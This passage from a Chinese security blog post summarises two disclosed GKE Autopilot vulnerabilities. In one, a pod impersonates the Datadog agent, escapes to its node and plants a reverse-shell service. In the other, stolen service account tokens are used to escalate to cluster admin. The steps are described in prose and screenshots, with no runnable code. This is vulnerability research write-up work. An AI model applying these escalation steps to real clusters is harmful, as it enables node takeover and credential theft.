<p>下面是引起漏洞发掘者注意的其中一个 Datadog agent的allowListedworkLoads配置。如果容器指定了列出的命令和映像，则允许它在只读卷中装载列出的主机路径。</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306281003231.png" alt="The screenshot shows the allow-listed workload configuration for one of the Datadog agents that caught our attention while searching for GKE Autopilot vulnerabilities. "></p>
<p>这里的安全问题是校验不充分。仅检查命令和映像不足以确保容器运行 Datadog 代码。</p>
<p>使用以下 PodSpec，容器可以在运行攻击者控制的代码时伪装成 Datadog agent，并滥用暴露的主机卷进行破坏。</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306281006198.png" alt="Using the PodSpec shown here, a container can masquerade as the Datadog agent while running attacker-controlled code, and abuse the exposed host volumes to break out."></p>
<p>在下面作者给出的视频中，恶意用户部署了一个伪装成 Datadog 代理的容器。Pod 通过以下步骤接管其底层节点：</p>
<ol>
<li>滥用挂载的 containerd socket来创建挂载主机文件系统的特权容器。</li>
<li>让该特权容器安装一个 systemd 服务，该服务会让node派生一个反向shell给攻击者</li>
</ol>
<p><a target="_blank" rel="noopener" href="https://youtu.be/0cZJklJxTQk">https://youtu.be/0cZJklJxTQk</a></p>
<h3 id="第二条攻击链"><a href="#第二条攻击链" class="headerlink" title="第二条攻击链"></a>第二条攻击链</h3><p>第二条攻击路径涉及的概念较多</p>
<p>简而言之的话，漏洞发掘者开发了一个 Python 工具，可将 Pod 的服务帐户映射到它们的 Kubernetes 权限（即角色和集群角色）名为sa-hunter 。</p>
<p>通过该工具，漏洞挖掘者发现默认安装了两个功能强大的 kube-system pod：<strong>stackdriver-metadata-agent-cluster-level</strong> <strong>和 metrics-server</strong>。两个 Pod 都可以更新现有部署。</p>
<p>乍一看，此权限可能看起来是无辜的，但足以权限提升到cluster admin。同时这些 Pod 也默认部署在GKE Standard中，这使得以下权限提升技术与所有 GKE 集群（<strong>GKE clusters, Standard and Autopilot</strong>）相关。</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306281013990.png" alt="Privileged role assigned to the metrics-server pod can update deployments."></p>
<p>后续获取并攻击服务账户token的攻击路径作者原文描述如下</p>
<blockquote>
<p>After taking over a node hosting either the stackdriver-metadata-agent-cluster-level or metrics-server pod, an attacker can harvest their service account token from the node filesystem. Armed with that token, the attacker can attain the privileges of any service account in the cluster with three simple steps:</p>
<ol>
<li><p>Update an existing deployment’s service account to the target service account. There are a number of preinstalled deployments, any one of which can be used for this step.</p>
</li>
<li><p>Add a malicious container to that deployment.</p>
</li>
<li><p>Have that malicious container retrieve the target service account token mounted in the container at &#x2F;run&#x2F;secrets&#x2F;kubernetes.io&#x2F;serviceaccount&#x2F;token.</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306281018381.png" alt="Abusing deployment update privileges to obtain any service account&#39;s token."></p>
</li>
</ol>
</blockquote>
<p>kube-system namespace提供了许多预安装的、功能极其强大的服务帐户可选择。clusterrole-aggregation-controller (CRAC） 服务帐户可能是主要候选帐户，因为它可以向现有群集角色添加任意权限。</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306281020487.png" alt="The clusterrole-aggregation-controller service account can escalate cluster roles."></p>
<p>获取 CRAC 令牌后，攻击者可以更新绑定到 CRAC 的集群角色以拥有所有权限。此时，攻击者实际上是集群管理员，并且不受 Autopilot 策略的约束</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306281022460.png" alt="image-20230628102225402"></p>
<p>作者给出的POC视频如下：</p>
<p><a target="_blank" rel="noopener" href="https://youtu.be/4Dddhk1QclY">https://youtu.be/4Dddhk1QclY</a></p>
<h3 id="漏洞发掘的思考点：-6"><a href="#漏洞发掘的思考点：-6" class="headerlink" title="漏洞发掘的思考点："></a><strong>漏洞发掘的思考点：</strong></h3><p>1.测试集群服务时，多多关注集群服务中允许以特权模式运行的POD</p>
<p>2.多多留意集群服务中preinstalled service的权限误配</p>
<h2 id="后言："><a href="#后言：" class="headerlink" title="后言："></a>后言：</h2><p>通过以上七个精妙的漏洞的学习与思考总结，不由得慨叹：老外顶级的漏洞挖掘者功底之扎实，思路之风骚，我们还有很长的路要走</p>
<p>博采天下众长，攘天下之学识为我所用——是新时代优秀hacker与geeker的能力标配</p>
</article><section class="jump-container is-flex is-justify-content-space-between my-6"><!-- em is empty placeholder--><a class="button is-default" href="/2023/12/01/%E6%9F%90%E5%A4%B4%E9%83%A8%E7%9B%B4%E8%BE%96%E5%B8%82%E6%94%BB%E9%98%B2%E6%BC%94%E7%BB%83%E7%BA%AA%E5%AE%9E-%E5%A6%82%E4%BD%95%E4%B8%8D%E7%94%A80day%E6%89%93%E4%B8%8Bn%E4%B8%AA%E7%82%B9/" title="某头部直辖市攻防演练纪实-如何不用0day打下n个点"><i class="iconfont icon-prev mr-2 has-text-grey"></i><span class="has-text-weight-semibold">上一页: 某头部直辖市攻防演练纪实-如何不用0day打下n个点</span></a><a class="button is-default" href="/2023/04/24/Mac-M1-Ventura%E8%A7%A3%E5%86%B3ProxyChains-ng%E5%AE%89%E8%A3%85%E5%A4%B1%E8%B4%A5/" title="Mac M1 Ventura解决ProxyChains-ng无法正常使用"><span class="has-text-weight-semibold">下一页: Mac M1 Ventura解决ProxyChains-ng无法正常使用</span><i class="iconfont icon-next ml-2 has-text-grey"></i></a></section><article class="mt-6 comment-container"><script async repo="j0o1ey/j0o1ey.github.io" src="https://utteranc.es/client.js" issue-term="pathname" theme="preferred-color-scheme"></script></article></div></div></main></main><footer class="is-flex is-flex-direction-column is-align-items-center is-flex-shrink-0 is-family-serif"><section class="sns-container"><a title="twitter" target="_blank" rel="noopener nofollow" href="//twitter.com//"><i class="iconfont icon-twitter"></i></a><!-- Github--><a title="github" target="_blank" rel="noopener nofollow" href="//github.com/j0o1ey"><i class="iconfont icon-github"></i></a><!-- Ins--><a title="instagram" target="_blank" rel="noopener nofollow" href="//www.instagram.com//"><i class="iconfont icon-ins"></i></a><!-- RSS--><!-- 知乎--><!-- 领英--><!-- 脸书--><a title="facebook" target="_blank" rel="noopener nofollow" href="//www.facebook.com//"><i class="iconfont icon-tian7_facebook"></i></a></section><p><span>Copyright ©</span><span> J0o1ey 2023</span></p><div class="is-flex is-justify-content-center is-flex-wrap-wrap"><p>Powered by Hexo &verbar;&nbsp;</p><p class="is-flex is-justify-content-center"><a title="Hexo theme author" target="_blank" rel="noopener" href="//github.com/haojen">Theme by Haojen&nbsp;</a></p><div style="margin-top: 2px"><a class="github-button" title="github-button" target="_blank" rel="noopener" href="https://github.com/haojen/hexo-theme-Claudia" data-color-scheme="no-preference: light; light: light; dark: dark;" data-show-count="true"></a></div></div><div><span></span></div></footer><script async defer src="https://buttons.github.io/buttons.js"></script><script src="/js/jquery-3.6.1.min.js"></script><script src="/js/jquery-fancybox.min.js"></script><script src="/js/img_zoom.js"></script><script src="/js/post.js"></script></body></html>